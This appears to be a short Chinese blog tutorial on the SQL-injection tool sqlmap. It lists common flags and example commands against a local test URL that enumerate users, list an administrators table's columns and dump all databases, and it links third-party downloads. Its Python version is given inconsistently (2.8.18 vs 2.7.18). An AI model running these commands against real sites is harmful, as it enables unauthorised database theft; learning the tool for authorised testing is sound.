首页 神兵利器,网络安全

sqlmap官网:http://sqlmap.org/
安装方法很简单,就不在讲述了。附带python2.8.18环境
请输入图片描述

sqlmap常用参数:
-u : 指定目标URL,sql注入点
–cookie : 当前会话的cookie值
-b : 获取数据库类型 检索数据库管理系统的标识
(DBMS:Database Management System 数据库管理系统)
–current-db : 获取当前数据库

–current-user :获取当前登录数据库使用的用户

测试注入点:sqlmap.py -u http://127.0.1.1/show.php?id=1
当前数据库:sqlmap.py -u http://127.0.1.1/show.php?id=1 --current-db
列出数据库用户名:sqlmap.py -u http://127.0.1.1/show.php?id=1 --users
找表字段:sqlmap.py -u http://127.0.1.1/show.php?id=1 -D bible_history -T administrators --columns
脱库神器:sqlmap.py -u http://127.0.1.1/show.php?id=1 --dump-all

sqlmap-1.4.11-12下载地址https://cloud.189.cn/t/BnaYfmiUfAFn (访问码:h6dt)
python-2.7.18下载地址https://cloud.189.cn/t/6N7VjaM3qABv (访问码:ur3y)



文章评论